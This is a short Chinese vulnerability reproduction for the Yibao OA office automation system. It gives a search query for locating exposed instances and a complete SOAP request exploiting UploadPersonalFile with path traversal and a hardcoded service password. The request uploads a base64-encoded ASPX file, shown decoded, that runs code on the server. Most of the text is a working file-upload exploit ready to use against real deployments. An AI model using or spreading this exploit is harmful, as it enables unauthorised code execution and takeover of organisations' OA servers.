》》》漏洞描述《《《
易宝 OA(Office Automation)是一款企业级办公自动化系统,旨在帮助企业实现高效的协同工作和业务流程管理。易宝 OA 提供了一系列功能强大的工具,包括但不限于流程审批、文档管理、日程安排、协同办公、人事管理等,为企业提供了一个集成化的解决方案。易宝 OA 的特点是易于使用、高度可定制、开放性强,支持多种平台和设备,可以满足不同企业的需求。易宝 OA 通过提高工作效率、降低运营成本、优化业务流程等方面,为企业带来了显著的商业价值。
》》》搜索语句《《《
product="顶讯科技-易宝OA系统"||title="欢迎登录易宝OA系统"
》》》漏洞复现《《《
POST /WebService/BasicService.asmx HTTP/1.1
Host:
Content-Type: text/xml; charset=utf-8
SOAPAction: http://tempuri.org/UploadPersonalFile
Content-Length: 666
<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><UploadPersonalFile xmlns="http://tempuri.org/"><fs>PCVAUGFnZSBMYW5ndWFnZT0iQyMiJT4KPCUKUmVzcG9uc2UuV3JpdGUoRm9ybXNBdXRoZW50aWNhdGlvbi5IYXNoUGFzc3dvcmRGb3JTdG9yaW5nSW5Db25maWdGaWxlKCJ0ZXN0MTIzIiwgIk1ENSIpKTsKU3lzdGVtLklPLkZpbGUuRGVsZXRlKFJlcXVlc3QuUGh5c2ljYWxQYXRoKTsKJT4=</fs><FileName>../../manager/1.aspx</FileName><webservicePassword>{ac80457b-368d-4062-b2dd-ae4d490e1c4b}</webservicePassword></UploadPersonalFile></soap:Body></soap:Envelope>
xml中包含着一段base64编码的数据
%@Page Language="C#"%>
<%
Response.Write(FormsAuthentication.HashPasswordForStoringInConfigFile("test123", "MD5"));
System.IO.File.Delete(Request.PhysicalPath);
%>
访问上传的1.aspx文件